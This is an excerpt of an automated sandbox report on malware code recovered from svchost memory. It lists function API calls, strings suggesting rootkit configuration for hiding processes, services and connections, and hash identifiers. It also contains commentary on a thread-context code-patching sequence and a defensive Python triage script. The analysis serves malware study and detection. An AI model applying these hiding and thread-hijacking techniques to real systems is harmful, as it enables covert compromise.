                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017DB
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A6613017F5
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301815
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A661301830
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301850
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A66130186B
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A66130188B
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A6613018A6
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A6613018C6
                                                          • SleepEx.KERNELBASE ref: 000002A661301BDF
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A6613018E1
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301901
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A66130191C
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A66130193C
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A661301957
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301977
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A661301992
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A66130199C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: 7e09be3a26c553d09d1367f6d9cb0504d23b14bf07e7149b4d8dfcef5065d6bf
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 8D312175B0064193FF50EB26D64D36963FCAB46FC9F0C54219E0BA7396DF2CC8588296

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: cf6f36a31f903a9fd4c55300e873ced9e69f280ad63d237708999190b6d26dd8
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: EAB17122B106908BEB58DF26D54CB99A3ECF746F85F485016EE0A63794DF39CD48C381

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID: _$6Z
                                                          • API String ID: 1239891234-452956228
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: d5c17cb4c7cf3c909d74c4f272eb40ba0ff49c0d8d52303684d6dee485b2997d
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 58419E32B14B8087E760CF24E84939E73A8F78AB55F580115EA8E57B98DF3CC559CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 7c7bed2822bbbddefe14a2c4e8ae70cd1b929ef9ccd2928db9dd9b6c0cd6b6fb
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 17314172B05B8086EB608F60E8593DD73A8F786B49F48442ADA4E67B98DF7CC54CC711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: _$6Z
                                                          • API String ID: 1164774033-452956228
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: d800bea69320285669c55395fba52c8977cf73a79cf2f715dd0c395abd9f532e
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: E3A1D522B046804BFB20DB75A48C3AD6BE9E743F95F1C4115DA9A37A99DF3CC44AC742

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: 228cb54c9f24d9abbe7ae523bc510dcbd55cd971a479beb4ba48184290aa91fe
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: AB711736B10A5086EB10DF65E89D69933B8FB86F8DF485121DA4E63B68DF38C548C381

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 8174c13da692b48cf880c32ba8988f71a7fcdaa5d5fe7493dd048a9d9e62287d
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 7C514A32B10B849BEB25CF62E44D35A77A5F78AF99F484124DE4A17768DF3CC0498741

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: d33c46db13dc7cd33e03f895f2b454a4c4ecdeca778de0e144b5f514b48c3e85
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 9B517A21B0174493EA199B56A80C3AA3298AB4BFB1F5C0725DE3F673D0DF3CD44D8696

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: _$6Z$csm$csm$csm
                                                          • API String ID: 849930591-752779984
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: 8eff3d94060b0506c183f273514c8ccba3cd936feb2acd8400ace85cd0207b59
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 9CD17032B047448BEB20DF65A44C39D77E8F746B99F180115EE8A67BA5DF38C489C782

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: 43e8135ebb0c35559ed7a18ea80bfe305a7e894e258808c59942dfd4b27a78db
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 1031C526F04A409BEB21DF12A84C759B3E4F78AFD5F4D0525DE4A67624DF3CC45A8381
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 4d92c4ea626ffa32eb01c2e09dbf1256c5470eb48489bf0b17e285afea8dfe7e
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: 5D315921B10B458BEB10DF22A88CB5A73E9FB8AF95F484125DE4B63764EF3CC4498741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: 0c7c2ff44e90409ce568f202e36e19cbd4341ffb8efed40e0aa12b8ee976ac47
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: 15D17B22F047808BEF609F65D49C39D37ACFB46B88F185115EA8957B96DF38C0A9C742
                                                          Control-flow Graph (rendered graph not captured; only the block list survived extraction): function starting at 2a661306270, block ids in the range 438-508. Its blocks call GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache and ResumeThread. Reading a thread's context, rewriting it, making a code range writable, flushing the instruction cache and then resuming the thread is the sequence used to patch code and redirect a suspended thread. Note that the Similarity block for this function records only Thread$Current$Context, so the VirtualProtect and FlushInstructionCache calls are visible only in the graph, not in the API ID.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID: _$6Z
                                                          • API String ID: 1666949209-452956228
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: 9e6d1a6d23f99b2325e117ac05e129a6918d3a22a01063be85214e515cd655ba
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 79D1BA76604B8882DA70DB0AE49835A77E4F3C9F89F140116EACE577A9CF3CC589CB41
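Each Similarity block above gives a recovered function an API ID (Joe Sandbox's compressed list of the Win32 API-name fragments it calls), a String ID, and an Opcode ID that stays the same when the same code is recovered from different memory dumps (the two __scrt_ startup entries further down share Opcode ID 53754b19... across the .00000003 and .00000002 dumps). The script below is an added example, not Joe Sandbox code: it parses entries in this page's text format into records, groups them by Opcode ID so one function is reported once with every dump it came from, and ranks them with a small indicator table of my own choosing. The input is a constructed excerpt of five entries copied from this page; the indicator wording (thread-context manipulation, named-pipe child-process control, and treating the LoadLibraryExW/GetProcAddress probe of an api-ms- name as the MSVC CRT's api-set loader and therefore benign) is my triage assumption, not a Joe Sandbox field.

```python
import re
from collections import defaultdict

# Constructed excerpt in this page's text format (five entries copied from the report).
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
• Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
• API ID: Thread$Current$Context
• String ID: _$6Z
• Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
APIs
• Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$nya-childproc
• Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
APIs
• Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
APIs
• Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
APIs
• LoadLibraryExW.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309B31
• FreeLibrary.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309BD7
• GetProcAddress.KERNEL32(?,?,?,000002A661309C6B,?,?,?,000002A66130945C,?,?,?,?,000002A661308F65), ref: 000002A661309BE3
• Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
"""

API_CALL = re.compile(r"^\s*•\s*(?P<api>\w+)\.\w+\(.*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
KEEP = {"Source File", "Snapshot File", "API ID", "String ID", "Opcode ID", "Instruction ID"}

def parse_entries(text):
    """One record per entry; an entry starts at the 'APIs' tab label. Bare tab labels
    (Strings, Memory Dump Source, ...) and 'Associated' dump bullets carry no data."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"APIs": []}
            entries.append(cur)
        elif cur is None:
            continue
        elif m := API_CALL.match(line):
            cur["APIs"].append({"api": m["api"], "ref": m["ref"]})
        elif (m := FIELD.match(line)) and m["key"].strip() in KEEP:
            cur[m["key"].strip()] = m["val"].strip()
    return entries

def triage(entry):
    """(level, note) pairs from an indicator table that is my own choice, not a Joe Sandbox field.
    API ID is Joe Sandbox's compressed list of API-name fragments, so match its CamelCase words."""
    api_id, string_id, notes = entry.get("API ID", ""), entry.get("String ID", ""), []
    tokens = set(re.findall(r"[A-Z][a-z]+", api_id))
    if {"Thread", "Context"} <= tokens:
        notes.append(("suspect", "get/set thread context: patching and redirecting a suspended thread"))
    if r"\\.\pipe" in string_id or {"File", "Process", "Create", "Read", "Write"} <= tokens:
        notes.append(("suspect", "child-process control channel: " + (string_id or "handle read/write")))
    if {"Library", "Load", "Proc", "Address"} <= tokens:
        # LoadLibraryExW/GetProcAddress/FreeLibrary probing an 'api-ms-' name is the MSVC
        # CRT's api-set fallback loader, not behaviour specific to this sample (my assumption).
        crt = string_id.startswith("api-ms-")
        notes.append(("benign" if crt else "info", "api-set probe (MSVC CRT)" if crt else "run-time import resolution"))
    if "__scrt_" in api_id:
        notes.append(("benign", "MSVC CRT startup code (__scrt_*)"))
    return notes

RANK = {"suspect": 0, "info": 1, "benign": 2}

def report(text):
    """Group entries by Opcode ID (the same function recovered from several dumps) and rank them."""
    groups = defaultdict(list)
    for e in parse_entries(text):
        groups[e.get("Opcode ID", "?")].append(e)
    rows = [{"opcode": op, "api_id": g[0].get("API ID", ""), "notes": triage(g[0]),
             "calls": [c["api"] for c in g[0]["APIs"]],
             "dumps": sorted({e.get("Source File", "").split(",")[0] for e in g})}
            for op, g in groups.items()]
    return sorted(rows, key=lambda r: min([RANK[lvl] for lvl, _ in r["notes"]] + [3]))

if __name__ == "__main__":
    for row in report(SAMPLE):
        print(row["opcode"][:12], row["api_id"][:44], f"{len(row['dumps'])} dump(s)", row["notes"])
```

Run against the full report text instead of SAMPLE, the grouping collapses every function that appears in both the .00000002 and .00000003 svchost dumps into one row, and the suspect rows surface the thread-context and named-pipe functions ahead of the CRT boilerplate that makes up most of the listing.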
                                                          Control-flow Graph (rendered graph not captured; only the block list survived extraction): function starting at 2a66130104c, block ids 510-522. Its blocks call RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc and HeapFree, with the RegEnumValueW block looping on itself: the function enumerates the values of an already-open registry key into a heap-allocated buffer.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: b836365c34d592cddc1f2c437e1d454bb1563a5ff996a1d7934b65f5a6e91958
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: B7417E32614B80DBE764CF21E44839A77B5F38AF99F488129DA8A17B58DF3CC449CB41
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
